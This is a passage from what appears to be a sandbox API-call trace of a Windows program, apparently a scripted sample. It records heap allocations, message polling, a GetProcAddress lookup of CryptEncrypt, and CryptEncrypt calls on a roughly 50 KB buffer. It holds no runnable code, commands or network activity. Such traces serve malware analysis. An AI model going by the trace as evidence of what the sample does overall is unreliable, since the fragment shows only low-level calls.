lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0242.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.274] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f558 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0242.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0242.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0242.275] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc394, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc398) returned 1 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0242.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0242.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0242.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0242.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0242.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0242.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0242.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0242.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0242.331] CharLowerBuffW (in: lpsz="byte[50072]", cchLength=0xb | out: lpsz="byte[50072]") returned 0xb [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0242.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0242.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0242.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0242.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0242.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0242.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0242.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0242.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.337] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0242.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0242.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0242.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0242.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0242.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e515b0 [0242.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e515b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0242.341] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f392f8*, pdwDataLen=0x8cef60*=0xc394, dwBufLen=0xc398 | out: pbData=0x2f392f8*, pdwDataLen=0x8cef60*=0xc398) returned 1 [0242.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0242.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0242.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0242.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0242.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0242.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0242.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 